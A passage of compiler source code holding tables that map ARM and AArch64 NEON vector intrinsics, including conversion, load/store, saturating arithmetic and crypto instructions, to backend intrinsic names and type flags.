NEONMAP1(vcvtn_u32_v, arm_neon_vcvtnu, 0),
NEONMAP1(vcvtn_u64_v, arm_neon_vcvtnu, 0),
NEONMAP1(vcvtnq_s16_v, arm_neon_vcvtns, 0),
NEONMAP1(vcvtnq_s32_v, arm_neon_vcvtns, 0),
NEONMAP1(vcvtnq_s64_v, arm_neon_vcvtns, 0),
NEONMAP1(vcvtnq_u16_v, arm_neon_vcvtnu, 0),
NEONMAP1(vcvtnq_u32_v, arm_neon_vcvtnu, 0),
NEONMAP1(vcvtnq_u64_v, arm_neon_vcvtnu, 0),
NEONMAP1(vcvtp_s16_v, arm_neon_vcvtps, 0),
NEONMAP1(vcvtp_s32_v, arm_neon_vcvtps, 0),
NEONMAP1(vcvtp_s64_v, arm_neon_vcvtps, 0),
NEONMAP1(vcvtp_u16_v, arm_neon_vcvtpu, 0),
NEONMAP1(vcvtp_u32_v, arm_neon_vcvtpu, 0),
NEONMAP1(vcvtp_u64_v, arm_neon_vcvtpu, 0),
NEONMAP1(vcvtpq_s16_v, arm_neon_vcvtps, 0),
NEONMAP1(vcvtpq_s32_v, arm_neon_vcvtps, 0),
NEONMAP1(vcvtpq_s64_v, arm_neon_vcvtps, 0),
NEONMAP1(vcvtpq_u16_v, arm_neon_vcvtpu, 0),
NEONMAP1(vcvtpq_u32_v, arm_neon_vcvtpu, 0),
NEONMAP1(vcvtpq_u64_v, arm_neon_vcvtpu, 0),
NEONMAP0(vcvtq_f16_v),
NEONMAP0(vcvtq_f32_v),
NEONMAP2(vcvtq_n_f16_v, arm_neon_vcvtfxu2fp, arm_neon_vcvtfxs2fp, 0),
NEONMAP2(vcvtq_n_f32_v, arm_neon_vcvtfxu2fp, arm_neon_vcvtfxs2fp, 0),
NEONMAP1(vcvtq_n_s16_v, arm_neon_vcvtfp2fxs, 0),
NEONMAP1(vcvtq_n_s32_v, arm_neon_vcvtfp2fxs, 0),
NEONMAP1(vcvtq_n_s64_v, arm_neon_vcvtfp2fxs, 0),
NEONMAP1(vcvtq_n_u16_v, arm_neon_vcvtfp2fxu, 0),
NEONMAP1(vcvtq_n_u32_v, arm_neon_vcvtfp2fxu, 0),
NEONMAP1(vcvtq_n_u64_v, arm_neon_vcvtfp2fxu, 0),
NEONMAP0(vcvtq_s16_v),
NEONMAP0(vcvtq_s32_v),
NEONMAP0(vcvtq_s64_v),
NEONMAP0(vcvtq_u16_v),
NEONMAP0(vcvtq_u32_v),
NEONMAP0(vcvtq_u64_v),
NEONMAP2(vdot_v, arm_neon_udot, arm_neon_sdot, 0),
NEONMAP2(vdotq_v, arm_neon_udot, arm_neon_sdot, 0),
NEONMAP0(vext_v),
NEONMAP0(vextq_v),
NEONMAP0(vfma_v),
NEONMAP0(vfmaq_v),
NEONMAP2(vhadd_v, arm_neon_vhaddu, arm_neon_vhadds, Add1ArgType | UnsignedAlts),
NEONMAP2(vhaddq_v, arm_neon_vhaddu, arm_neon_vhadds, Add1ArgType | UnsignedAlts),
NEONMAP2(vhsub_v, arm_neon_vhsubu, arm_neon_vhsubs, Add1ArgType | UnsignedAlts),
NEONMAP2(vhsubq_v, arm_neon_vhsubu, arm_neon_vhsubs, Add1ArgType | UnsignedAlts),
NEONMAP0(vld1_dup_v),
NEONMAP1(vld1_v, arm_neon_vld1, 0),
NEONMAP1(vld1_x2_v, arm_neon_vld1x2, 0),
NEONMAP1(vld1_x3_v, arm_neon_vld1x3, 0),
NEONMAP1(vld1_x4_v, arm_neon_vld1x4, 0),
NEONMAP0(vld1q_dup_v),
NEONMAP1(vld1q_v, arm_neon_vld1, 0),
NEONMAP1(vld1q_x2_v, arm_neon_vld1x2, 0),
NEONMAP1(vld1q_x3_v, arm_neon_vld1x3, 0),
NEONMAP1(vld1q_x4_v, arm_neon_vld1x4, 0),
NEONMAP1(vld2_dup_v, arm_neon_vld2dup, 0),
NEONMAP1(vld2_lane_v, arm_neon_vld2lane, 0),
NEONMAP1(vld2_v, arm_neon_vld2, 0),
NEONMAP1(vld2q_dup_v, arm_neon_vld2dup, 0),
NEONMAP1(vld2q_lane_v, arm_neon_vld2lane, 0),
NEONMAP1(vld2q_v, arm_neon_vld2, 0),
NEONMAP1(vld3_dup_v, arm_neon_vld3dup, 0),
NEONMAP1(vld3_lane_v, arm_neon_vld3lane, 0),
NEONMAP1(vld3_v, arm_neon_vld3, 0),
NEONMAP1(vld3q_dup_v, arm_neon_vld3dup, 0),
NEONMAP1(vld3q_lane_v, arm_neon_vld3lane, 0),
NEONMAP1(vld3q_v, arm_neon_vld3, 0),
NEONMAP1(vld4_dup_v, arm_neon_vld4dup, 0),
NEONMAP1(vld4_lane_v, arm_neon_vld4lane, 0),
NEONMAP1(vld4_v, arm_neon_vld4, 0),
NEONMAP1(vld4q_dup_v, arm_neon_vld4dup, 0),
NEONMAP1(vld4q_lane_v, arm_neon_vld4lane, 0),
NEONMAP1(vld4q_v, arm_neon_vld4, 0),
NEONMAP2(vmax_v, arm_neon_vmaxu, arm_neon_vmaxs, Add1ArgType | UnsignedAlts),
NEONMAP1(vmaxnm_v, arm_neon_vmaxnm, Add1ArgType),
NEONMAP1(vmaxnmq_v, arm_neon_vmaxnm, Add1ArgType),
NEONMAP2(vmaxq_v, arm_neon_vmaxu, arm_neon_vmaxs, Add1ArgType | UnsignedAlts),
NEONMAP2(vmin_v, arm_neon_vminu, arm_neon_vmins, Add1ArgType | UnsignedAlts),
NEONMAP1(vminnm_v, arm_neon_vminnm, Add1ArgType),
NEONMAP1(vminnmq_v, arm_neon_vminnm, Add1ArgType),
NEONMAP2(vminq_v, arm_neon_vminu, arm_neon_vmins, Add1ArgType | UnsignedAlts),
NEONMAP2(vmmlaq_v, arm_neon_ummla, arm_neon_smmla, 0),
NEONMAP0(vmovl_v),
NEONMAP0(vmovn_v),
NEONMAP1(vmul_v, arm_neon_vmulp, Add1ArgType),
NEONMAP0(vmull_v),
NEONMAP1(vmulq_v, arm_neon_vmulp, Add1ArgType),
NEONMAP2(vpadal_v, arm_neon_vpadalu, arm_neon_vpadals, UnsignedAlts),
NEONMAP2(vpadalq_v, arm_neon_vpadalu, arm_neon_vpadals, UnsignedAlts),
NEONMAP1(vpadd_v, arm_neon_vpadd, Add1ArgType),
NEONMAP2(vpaddl_v, arm_neon_vpaddlu, arm_neon_vpaddls, UnsignedAlts),
NEONMAP2(vpaddlq_v, arm_neon_vpaddlu, arm_neon_vpaddls, UnsignedAlts),
NEONMAP1(vpaddq_v, arm_neon_vpadd, Add1ArgType),
NEONMAP2(vpmax_v, arm_neon_vpmaxu, arm_neon_vpmaxs, Add1ArgType | UnsignedAlts),
NEONMAP2(vpmin_v, arm_neon_vpminu, arm_neon_vpmins, Add1ArgType | UnsignedAlts),
NEONMAP1(vqabs_v, arm_neon_vqabs, Add1ArgType),
NEONMAP1(vqabsq_v, arm_neon_vqabs, Add1ArgType),
NEONMAP2(vqadd_v, uadd_sat, sadd_sat, Add1ArgType | UnsignedAlts),
NEONMAP2(vqaddq_v, uadd_sat, sadd_sat, Add1ArgType | UnsignedAlts),
NEONMAP2(vqdmlal_v, arm_neon_vqdmull, sadd_sat, 0),
NEONMAP2(vqdmlsl_v, arm_neon_vqdmull, ssub_sat, 0),
NEONMAP1(vqdmulh_v, arm_neon_vqdmulh, Add1ArgType),
NEONMAP1(vqdmulhq_v, arm_neon_vqdmulh, Add1ArgType),
NEONMAP1(vqdmull_v, arm_neon_vqdmull, Add1ArgType),
NEONMAP2(vqmovn_v, arm_neon_vqmovnu, arm_neon_vqmovns, Add1ArgType | UnsignedAlts),
NEONMAP1(vqmovun_v, arm_neon_vqmovnsu, Add1ArgType),
NEONMAP1(vqneg_v, arm_neon_vqneg, Add1ArgType),
NEONMAP1(vqnegq_v, arm_neon_vqneg, Add1ArgType),
NEONMAP1(vqrdmulh_v, arm_neon_vqrdmulh, Add1ArgType),
NEONMAP1(vqrdmulhq_v, arm_neon_vqrdmulh, Add1ArgType),
NEONMAP2(vqrshl_v, arm_neon_vqrshiftu, arm_neon_vqrshifts, Add1ArgType | UnsignedAlts),
NEONMAP2(vqrshlq_v, arm_neon_vqrshiftu, arm_neon_vqrshifts, Add1ArgType | UnsignedAlts),
NEONMAP2(vqshl_n_v, arm_neon_vqshiftu, arm_neon_vqshifts, UnsignedAlts),
NEONMAP2(vqshl_v, arm_neon_vqshiftu, arm_neon_vqshifts, Add1ArgType | UnsignedAlts),
NEONMAP2(vqshlq_n_v, arm_neon_vqshiftu, arm_neon_vqshifts, UnsignedAlts),
NEONMAP2(vqshlq_v, arm_neon_vqshiftu, arm_neon_vqshifts, Add1ArgType | UnsignedAlts),
NEONMAP1(vqshlu_n_v, arm_neon_vqshiftsu, 0),
NEONMAP1(vqshluq_n_v, arm_neon_vqshiftsu, 0),
NEONMAP2(vqsub_v, usub_sat, ssub_sat, Add1ArgType | UnsignedAlts),
NEONMAP2(vqsubq_v, usub_sat, ssub_sat, Add1ArgType | UnsignedAlts),
NEONMAP1(vraddhn_v, arm_neon_vraddhn, Add1ArgType),
NEONMAP2(vrecpe_v, arm_neon_vrecpe, arm_neon_vrecpe, 0),
NEONMAP2(vrecpeq_v, arm_neon_vrecpe, arm_neon_vrecpe, 0),
NEONMAP1(vrecps_v, arm_neon_vrecps, Add1ArgType),
NEONMAP1(vrecpsq_v, arm_neon_vrecps, Add1ArgType),
NEONMAP2(vrhadd_v, arm_neon_vrhaddu, arm_neon_vrhadds, Add1ArgType | UnsignedAlts),
NEONMAP2(vrhaddq_v, arm_neon_vrhaddu, arm_neon_vrhadds, Add1ArgType | UnsignedAlts),
NEONMAP1(vrnd_v, arm_neon_vrintz, Add1ArgType),
NEONMAP1(vrnda_v, arm_neon_vrinta, Add1ArgType),
NEONMAP1(vrndaq_v, arm_neon_vrinta, Add1ArgType),
NEONMAP0(vrndi_v),
NEONMAP0(vrndiq_v),
NEONMAP1(vrndm_v, arm_neon_vrintm, Add1ArgType),
NEONMAP1(vrndmq_v, arm_neon_vrintm, Add1ArgType),
NEONMAP1(vrndn_v, arm_neon_vrintn, Add1ArgType),
NEONMAP1(vrndnq_v, arm_neon_vrintn, Add1ArgType),
NEONMAP1(vrndp_v, arm_neon_vrintp, Add1ArgType),
NEONMAP1(vrndpq_v, arm_neon_vrintp, Add1ArgType),
NEONMAP1(vrndq_v, arm_neon_vrintz, Add1ArgType),
NEONMAP1(vrndx_v, arm_neon_vrintx, Add1ArgType),
NEONMAP1(vrndxq_v, arm_neon_vrintx, Add1ArgType),
NEONMAP2(vrshl_v, arm_neon_vrshiftu, arm_neon_vrshifts, Add1ArgType | UnsignedAlts),
NEONMAP2(vrshlq_v, arm_neon_vrshiftu, arm_neon_vrshifts, Add1ArgType | UnsignedAlts),
NEONMAP2(vrshr_n_v, arm_neon_vrshiftu, arm_neon_vrshifts, UnsignedAlts),
NEONMAP2(vrshrq_n_v, arm_neon_vrshiftu, arm_neon_vrshifts, UnsignedAlts),
NEONMAP2(vrsqrte_v, arm_neon_vrsqrte, arm_neon_vrsqrte, 0),
NEONMAP2(vrsqrteq_v, arm_neon_vrsqrte, arm_neon_vrsqrte, 0),
NEONMAP1(vrsqrts_v, arm_neon_vrsqrts, Add1ArgType),
NEONMAP1(vrsqrtsq_v, arm_neon_vrsqrts, Add1ArgType),
NEONMAP1(vrsubhn_v, arm_neon_vrsubhn, Add1ArgType),
NEONMAP1(vsha1su0q_v, arm_neon_sha1su0, 0),
NEONMAP1(vsha1su1q_v, arm_neon_sha1su1, 0),
NEONMAP1(vsha256h2q_v, arm_neon_sha256h2, 0),
NEONMAP1(vsha256hq_v, arm_neon_sha256h, 0),
NEONMAP1(vsha256su0q_v, arm_neon_sha256su0, 0),
NEONMAP1(vsha256su1q_v, arm_neon_sha256su1, 0),
NEONMAP0(vshl_n_v),
NEONMAP2(vshl_v, arm_neon_vshiftu, arm_neon_vshifts, Add1ArgType | UnsignedAlts),
NEONMAP0(vshll_n_v),
NEONMAP0(vshlq_n_v),
NEONMAP2(vshlq_v, arm_neon_vshiftu, arm_neon_vshifts, Add1ArgType | UnsignedAlts),
NEONMAP0(vshr_n_v),
NEONMAP0(vshrn_n_v),
NEONMAP0(vshrq_n_v),
NEONMAP1(vst1_v, arm_neon_vst1, 0),
NEONMAP1(vst1_x2_v, arm_neon_vst1x2, 0),
NEONMAP1(vst1_x3_v, arm_neon_vst1x3, 0),
NEONMAP1(vst1_x4_v, arm_neon_vst1x4, 0),
NEONMAP1(vst1q_v, arm_neon_vst1, 0),
NEONMAP1(vst1q_x2_v, arm_neon_vst1x2, 0),
NEONMAP1(vst1q_x3_v, arm_neon_vst1x3, 0),
NEONMAP1(vst1q_x4_v, arm_neon_vst1x4, 0),
NEONMAP1(vst2_lane_v, arm_neon_vst2lane, 0),
NEONMAP1(vst2_v, arm_neon_vst2, 0),
NEONMAP1(vst2q_lane_v, arm_neon_vst2lane, 0),
NEONMAP1(vst2q_v, arm_neon_vst2, 0),
NEONMAP1(vst3_lane_v, arm_neon_vst3lane, 0),
NEONMAP1(vst3_v, arm_neon_vst3, 0),
NEONMAP1(vst3q_lane_v, arm_neon_vst3lane, 0),
NEONMAP1(vst3q_v, arm_neon_vst3, 0),
NEONMAP1(vst4_lane_v, arm_neon_vst4lane, 0),
NEONMAP1(vst4_v, arm_neon_vst4, 0),
NEONMAP1(vst4q_lane_v, arm_neon_vst4lane, 0),
NEONMAP1(vst4q_v, arm_neon_vst4, 0),
NEONMAP0(vsubhn_v),
NEONMAP0(vtrn_v),
NEONMAP0(vtrnq_v),
NEONMAP0(vtst_v),
NEONMAP0(vtstq_v),
NEONMAP1(vusdot_v, arm_neon_usdot, 0),
NEONMAP1(vusdotq_v, arm_neon_usdot, 0),
NEONMAP1(vusmmlaq_v, arm_neon_usmmla, 0),
NEONMAP0(vuzp_v),
NEONMAP0(vuzpq_v),
NEONMAP0(vzip_v),
NEONMAP0(vzipq_v)
};
static const ARMVectorIntrinsicInfo AArch64SIMDIntrinsicMap[] = {
NEONMAP1(__a64_vcvtq_low_bf16_v, aarch64_neon_bfcvtn, 0),
NEONMAP0(splat_lane_v),
NEONMAP0(splat_laneq_v),
NEONMAP0(splatq_lane_v),
NEONMAP0(splatq_laneq_v),
NEONMAP1(vabs_v, aarch64_neon_abs, 0),
NEONMAP1(vabsq_v, aarch64_neon_abs, 0),
NEONMAP0(vadd_v),
NEONMAP0(vaddhn_v),
NEONMAP0(vaddq_p128),
NEONMAP0(vaddq_v),
NEONMAP1(vaesdq_v, aarch64_crypto_aesd, 0),
NEONMAP1(vaeseq_v, aarch64_crypto_aese, 0),
NEONMAP1(vaesimcq_v, aarch64_crypto_aesimc, 0),
NEONMAP1(vaesmcq_v, aarch64_crypto_aesmc, 0),
NEONMAP2(vbcaxq_v, aarch64_crypto_bcaxu, aarch64_crypto_bcaxs, Add1ArgType | UnsignedAlts),
NEONMAP1(vbfdot_v, aarch64_neon_bfdot, 0),
NEONMAP1(vbfdotq_v, aarch64_neon_bfdot, 0),
NEONMAP1(vbfmlalbq_v, aarch64_neon_bfmlalb, 0),
NEONMAP1(vbfmlaltq_v, aarch64_neon_bfmlalt, 0),
NEONMAP1(vbfmmlaq_v, aarch64_neon_bfmmla, 0),
NEONMAP1(vcadd_rot270_v, aarch64_neon_vcadd_rot270, Add1ArgType),
NEONMAP1(vcadd_rot90_v, aarch64_neon_vcadd_rot90, Add1ArgType),
NEONMAP1(vcaddq_rot270_v, aarch64_neon_vcadd_rot270, Add1ArgType),
NEONMAP1(vcaddq_rot90_v, aarch64_neon_vcadd_rot90, Add1ArgType),
NEONMAP1(vcage_v, aarch64_neon_facge, 0),
NEONMAP1(vcageq_v, aarch64_neon_facge, 0),
NEONMAP1(vcagt_v, aarch64_neon_facgt, 0),
NEONMAP1(vcagtq_v, aarch64_neon_facgt, 0),
NEONMAP1(vcale_v, aarch64_neon_facge, 0),
NEONMAP1(vcaleq_v, aarch64_neon_facge, 0),
NEONMAP1(vcalt_v, aarch64_neon_facgt, 0),
NEONMAP1(vcaltq_v, aarch64_neon_facgt, 0),
NEONMAP0(vceqz_v),
NEONMAP0(vceqzq_v),
NEONMAP0(vcgez_v),
NEONMAP0(vcgezq_v),
NEONMAP0(vcgtz_v),
NEONMAP0(vcgtzq_v),
NEONMAP0(vclez_v),
NEONMAP0(vclezq_v),
NEONMAP1(vcls_v, aarch64_neon_cls, Add1ArgType),
NEONMAP1(vclsq_v, aarch64_neon_cls, Add1ArgType),
NEONMAP0(vcltz_v),
NEONMAP0(vcltzq_v),
NEONMAP1(vclz_v, ctlz, Add1ArgType),
NEONMAP1(vclzq_v, ctlz, Add1ArgType),
NEONMAP1(vcmla_rot180_v, aarch64_neon_vcmla_rot180, Add1ArgType),
NEONMAP1(vcmla_rot270_v, aarch64_neon_vcmla_rot270, Add1ArgType),
NEONMAP1(vcmla_rot90_v, aarch64_neon_vcmla_rot90, Add1ArgType),
NEONMAP1(vcmla_v, aarch64_neon_vcmla_rot0, Add1ArgType),
NEONMAP1(vcmlaq_rot180_v, aarch64_neon_vcmla_rot180, Add1ArgType),
NEONMAP1(vcmlaq_rot270_v, aarch64_neon_vcmla_rot270, Add1ArgType),
NEONMAP1(vcmlaq_rot90_v, aarch64_neon_vcmla_rot90, Add1ArgType),
NEONMAP1(vcmlaq_v, aarch64_neon_vcmla_rot0, Add1ArgType),
NEONMAP1(vcnt_v, ctpop, Add1ArgType),
NEONMAP1(vcntq_v, ctpop, Add1ArgType),
NEONMAP1(vcvt_f16_f32, aarch64_neon_vcvtfp2hf, 0),
NEONMAP0(vcvt_f16_v),
NEONMAP1(vcvt_f32_f16, aarch64_neon_vcvthf2fp, 0),
NEONMAP0(vcvt_f32_v),
NEONMAP2(vcvt_n_f16_v, aarch64_neon_vcvtfxu2fp, aarch64_neon_vcvtfxs2fp, 0),
NEONMAP2(vcvt_n_f32_v, aarch64_neon_vcvtfxu2fp, aarch64_neon_vcvtfxs2fp, 0),
NEONMAP2(vcvt_n_f64_v, aarch64_neon_vcvtfxu2fp, aarch64_neon_vcvtfxs2fp, 0),
NEONMAP1(vcvt_n_s16_v, aarch64_neon_vcvtfp2fxs, 0),
NEONMAP1(vcvt_n_s32_v, aarch64_neon_vcvtfp2fxs, 0),
NEONMAP1(vcvt_n_s64_v, aarch64_neon_vcvtfp2fxs, 0),
NEONMAP1(vcvt_n_u16_v, aarch64_neon_vcvtfp2fxu, 0),
NEONMAP1(vcvt_n_u32_v, aarch64_neon_vcvtfp2fxu, 0),
NEONMAP1(vcvt_n_u64_v, aarch64_neon_vcvtfp2fxu, 0),
NEONMAP0(vcvtq_f16_v),
NEONMAP0(vcvtq_f32_v),
NEONMAP1(vcvtq_high_bf16_v, aarch64_neon_bfcvtn2, 0),
NEONMAP2(vcvtq_n_f16_v, aarch64_neon_vcvtfxu2fp, aarch64_neon_vcvtfxs2fp, 0),
NEONMAP2(vcvtq_n_f32_v, aarch64_neon_vcvtfxu2fp, aarch64_neon_vcvtfxs2fp, 0),
NEONMAP2(vcvtq_n_f64_v, aarch64_neon_vcvtfxu2fp, aarch64_neon_vcvtfxs2fp, 0),
NEONMAP1(vcvtq_n_s16_v, aarch64_neon_vcvtfp2fxs, 0),
NEONMAP1(vcvtq_n_s32_v, aarch64_neon_vcvtfp2fxs, 0),
NEONMAP1(vcvtq_n_s64_v, aarch64_neon_vcvtfp2fxs, 0),
NEONMAP1(vcvtq_n_u16_v, aarch64_neon_vcvtfp2fxu, 0),
NEONMAP1(vcvtq_n_u32_v, aarch64_neon_vcvtfp2fxu, 0),
NEONMAP1(vcvtq_n_u64_v, aarch64_neon_vcvtfp2fxu, 0),
NEONMAP1(vcvtx_f32_v, aarch64_neon_fcvtxn, AddRetType | Add1ArgType),
NEONMAP2(vdot_v, aarch64_neon_udot, aarch64_neon_sdot, 0),
NEONMAP2(vdotq_v, aarch64_neon_udot, aarch64_neon_sdot, 0),
NEONMAP2(veor3q_v, aarch64_crypto_eor3u, aarch64_crypto_eor3s, Add1ArgType | UnsignedAlts),
NEONMAP0(vext_v),
NEONMAP0(vextq_v),
NEONMAP0(vfma_v),
NEONMAP0(vfmaq_v),
NEONMAP1(vfmlal_high_v, aarch64_neon_fmlal2, 0),
NEONMAP1(vfmlal_low_v, aarch64_neon_fmlal, 0),
NEONMAP1(vfmlalq_high_v, aarch64_neon_fmlal2, 0),
NEONMAP1(vfmlalq_low_v, aarch64_neon_fmlal, 0),
NEONMAP1(vfmlsl_high_v, aarch64_neon_fmlsl2, 0),
NEONMAP1(vfmlsl_low_v, aarch64_neon_fmlsl, 0),
NEONMAP1(vfmlslq_high_v, aarch64_neon_fmlsl2, 0),
NEONMAP1(vfmlslq_low_v, aarch64_neon_fmlsl, 0),
NEONMAP2(vhadd_v, aarch64_neon_uhadd, aarch64_neon_shadd, Add1ArgType | UnsignedAlts),
NEONMAP2(vhaddq_v, aarch64_neon_uhadd, aarch64_neon_shadd, Add1ArgType | UnsignedAlts),
NEONMAP2(vhsub_v, aarch64_neon_uhsub, aarch64_neon_shsub, Add1ArgType | UnsignedAlts),
NEONMAP2(vhsubq_v, aarch64_neon_uhsub, aarch64_neon_shsub, Add1ArgType | UnsignedAlts),
NEONMAP1(vld1_x2_v, aarch64_neon_ld1x2, 0),
NEONMAP1(vld1_x3_v, aarch64_neon_ld1x3, 0),
NEONMAP1(vld1_x4_v, aarch64_neon_ld1x4, 0),
NEONMAP1(vld1q_x2_v, aarch64_neon_ld1x2, 0),
NEONMAP1(vld1q_x3_v, aarch64_neon_ld1x3, 0),
NEONMAP1(vld1q_x4_v, aarch64_neon_ld1x4, 0),
NEONMAP2(vmmlaq_v, aarch64_neon_ummla, aarch64_neon_smmla, 0),
NEONMAP0(vmovl_v),
NEONMAP0(vmovn_v),
NEONMAP1(vmul_v, aarch64_neon_pmul, Add1ArgType),
NEONMAP1(vmulq_v, aarch64_neon_pmul, Add1ArgType),
NEONMAP1(vpadd_v, aarch64_neon_addp, Add1ArgType),
NEONMAP2(vpaddl_v, aarch64_neon_uaddlp, aarch64_neon_saddlp, UnsignedAlts),
NEONMAP2(vpaddlq_v, aarch64_neon_uaddlp, aarch64_neon_saddlp, UnsignedAlts),
NEONMAP1(vpaddq_v, aarch64_neon_addp, Add1ArgType),
NEONMAP1(vqabs_v, aarch64_neon_sqabs, Add1ArgType),
NEONMAP1(vqabsq_v, aarch64_neon_sqabs, Add1ArgType),
NEONMAP2(vqadd_v, aarch64_neon_uqadd, aarch64_neon_sqadd, Add1ArgType | UnsignedAlts),
NEONMAP2(vqaddq_v, aarch64_neon_uqadd, aarch64_neon_sqadd, Add1ArgType | UnsignedAlts),
NEONMAP2(vqdmlal_v, aarch64_neon_sqdmull, aarch64_neon_sqadd, 0),
NEONMAP2(vqdmlsl_v, aarch64_neon_sqdmull, aarch64_neon_sqsub, 0),
NEONMAP1(vqdmulh_lane_v, aarch64_neon_sqdmulh_lane, 0),
NEONMAP1(vqdmulh_laneq_v, aarch64_neon_sqdmulh_laneq, 0),
NEONMAP1(vqdmulh_v, aarch64_neon_sqdmulh, Add1ArgType),
NEONMAP1(vqdmulhq_lane_v, aarch64_neon_sqdmulh_lane, 0),
NEONMAP1(vqdmulhq_laneq_v, aarch64_neon_sqdmulh_laneq, 0),
NEONMAP1(vqdmulhq_v, aarch64_neon_sqdmulh, Add1ArgType),
NEONMAP1(vqdmull_v, aarch64_neon_sqdmull, Add1ArgType),
NEONMAP2(vqmovn_v, aarch64_neon_uqxtn, aarch64_neon_sqxtn, Add1ArgType | UnsignedAlts),
NEONMAP1(vqmovun_v, aarch64_neon_sqxtun, Add1ArgType),
NEONMAP1(vqneg_v, aarch64_neon_sqneg, Add1ArgType),
NEONMAP1(vqnegq_v, aarch64_neon_sqneg, Add1ArgType),
NEONMAP1(vqrdmulh_lane_v, aarch64_neon_sqrdmulh_lane, 0),
NEONMAP1(vqrdmulh_laneq_v, aarch64_neon_sqrdmulh_laneq, 0),
NEONMAP1(vqrdmulh_v, aarch64_neon_sqrdmulh, Add1ArgType),
NEONMAP1(vqrdmulhq_lane_v, aarch64_neon_sqrdmulh_lane, 0),
NEONMAP1(vqrdmulhq_laneq_v, aarch64_neon_sqrdmulh_laneq, 0),
NEONMAP1(vqrdmulhq_v, aarch64_neon_sqrdmulh, Add1ArgType),
NEONMAP2(vqrshl_v, aarch64_neon_uqrshl, aarch64_neon_sqrshl, Add1ArgType | UnsignedAlts),
NEONMAP2(vqrshlq_v, aarch64_neon_uqrshl, aarch64_neon_sqrshl, Add1ArgType | UnsignedAlts),
NEONMAP2(vqshl_n_v, aarch64_neon_uqshl, aarch64_neon_sqshl, UnsignedAlts),
NEONMAP2(vqshl_v, aarch64_neon_uqshl, aarch64_neon_sqshl, Add1ArgType | UnsignedAlts),
NEONMAP2(vqshlq_n_v, aarch64_neon_uqshl, aarch64_neon_sqshl,UnsignedAlts),
NEONMAP2(vqshlq_v, aarch64_neon_uqshl, aarch64_neon_sqshl, Add1ArgType | UnsignedAlts),
NEONMAP1(vqshlu_n_v, aarch64_neon_sqshlu, 0),
NEONMAP1(vqshluq_n_v, aarch64_neon_sqshlu, 0),
NEONMAP2(vqsub_v, aarch64_neon_uqsub, aarch64_neon_sqsub, Add1ArgType | UnsignedAlts),
NEONMAP2(vqsubq_v, aarch64_neon_uqsub, aarch64_neon_sqsub, Add1ArgType | UnsignedAlts),
NEONMAP1(vraddhn_v, aarch64_neon_raddhn, Add1ArgType),
NEONMAP1(vrax1q_v, aarch64_crypto_rax1, 0),
NEONMAP2(vrecpe_v, aarch64_neon_frecpe, aarch64_neon_urecpe, 0),
NEONMAP2(vrecpeq_v, aarch64_neon_frecpe, aarch64_neon_urecpe, 0),
NEONMAP1(vrecps_v, aarch64_neon_frecps, Add1ArgType),
NEONMAP1(vrecpsq_v, aarch64_neon_frecps, Add1ArgType),
NEONMAP2(vrhadd_v, aarch64_neon_urhadd, aarch64_neon_srhadd, Add1ArgType | UnsignedAlts),
NEONMAP2(vrhaddq_v, aarch64_neon_urhadd, aarch64_neon_srhadd, Add1ArgType | UnsignedAlts),
NEONMAP1(vrnd32x_v, aarch64_neon_frint32x, Add1ArgType),
NEONMAP1(vrnd32xq_v, aarch64_neon_frint32x, Add1ArgType),
NEONMAP1(vrnd32z_v, aarch64_neon_frint32z, Add1ArgType),
NEONMAP1(vrnd32zq_v, aarch64_neon_frint32z, Add1ArgType),
NEONMAP1(vrnd64x_v, aarch64_neon_frint64x, Add1ArgType),
NEONMAP1(vrnd64xq_v, aarch64_neon_frint64x, Add1ArgType),
NEONMAP1(vrnd64z_v, aarch64_neon_frint64z, Add1ArgType),
NEONMAP1(vrnd64zq_v, aarch64_neon_frint64z, Add1ArgType),
NEONMAP0(vrndi_v),
NEONMAP0(vrndiq_v),
NEONMAP2(vrshl_v, aarch64_neon_urshl, aarch64_neon_srshl, Add1ArgType | UnsignedAlts),
NEONMAP2(vrshlq_v, aarch64_neon_urshl, aarch64_neon_srshl, Add1ArgType | UnsignedAlts),
NEONMAP2(vrshr_n_v, aarch64_neon_urshl, aarch64_neon_srshl, UnsignedAlts),
NEONMAP2(vrshrq_n_v, aarch64_neon_urshl, aarch64_neon_srshl, UnsignedAlts),
NEONMAP2(vrsqrte_v, aarch64_neon_frsqrte, aarch64_neon_ursqrte, 0),
NEONMAP2(vrsqrteq_v, aarch64_neon_frsqrte, aarch64_neon_ursqrte, 0),
NEONMAP1(vrsqrts_v, aarch64_neon_frsqrts, Add1ArgType),
NEONMAP1(vrsqrtsq_v, aarch64_neon_frsqrts, Add1ArgType),
NEONMAP1(vrsubhn_v, aarch64_neon_rsubhn, Add1ArgType),
NEONMAP1(vsha1su0q_v, aarch64_crypto_sha1su0, 0),
NEONMAP1(vsha1su1q_v, aarch64_crypto_sha1su1, 0),
NEONMAP1(vsha256h2q_v, aarch64_crypto_sha256h2, 0),
NEONMAP1(vsha256hq_v, aarch64_crypto_sha256h, 0),
NEONMAP1(vsha256su0q_v, aarch64_crypto_sha256su0, 0),
NEONMAP1(vsha256su1q_v, aarch64_crypto_sha256su1, 0),
NEONMAP1(vsha512h2q_v, aarch64_crypto_sha512h2, 0),
NEONMAP1(vsha512hq_v, aarch64_crypto_sha512h, 0),
NEONMAP1(vsha512su0q_v, aarch64_crypto_sha512su0, 0),
NEONMAP1(vsha512su1q_v, aarch64_crypto_sha512su1, 0),
NEONMAP0(vshl_n_v),
NEONMAP2(vshl_v, aarch64_neon_ushl, aarch64_neon_sshl, Add1ArgType | UnsignedAlts),
NEONMAP0(vshll_n_v),
NEONMAP0(vshlq_n_v),
NEONMAP2(vshlq_v, aarch64_neon_ushl, aarch64_neon_sshl, Add1ArgType | UnsignedAlts),
NEONMAP0(vshr_n_v),
NEONMAP0(vshrn_n_v),
NEONMAP0(vshrq_n_v),
NEONMAP1(vsm3partw1q_v, aarch64_crypto_sm3partw1, 0),
NEONMAP1(vsm3partw2q_v, aarch64_crypto_sm3partw2, 0),
NEONMAP1(vsm3ss1q_v, aarch64_crypto_sm3ss1, 0),
NEONMAP1(vsm3tt1aq_v, aarch64_crypto_sm3tt1a, 0),
NEONMAP1(vsm3tt1bq_v, aarch64_crypto_sm3tt1b, 0),
NEONMAP1(vsm3tt2aq_v, aarch64_crypto_sm3tt2a, 0),
NEONMAP1(vsm3tt2bq_v, aarch64_crypto_sm3tt2b, 0),
NEONMAP1(vsm4ekeyq_v, aarch64_crypto_sm4ekey, 0),
NEONMAP1(vsm4eq_v, aarch64_crypto_sm4e, 0),
NEONMAP1(vst1_x2_v, aarch64_neon_st1x2, 0),
NEONMAP1(vst1_x3_v, aarch64_neon_st1x3, 0),
NEONMAP1(vst1_x4_v, aarch64_neon_st1x4, 0),
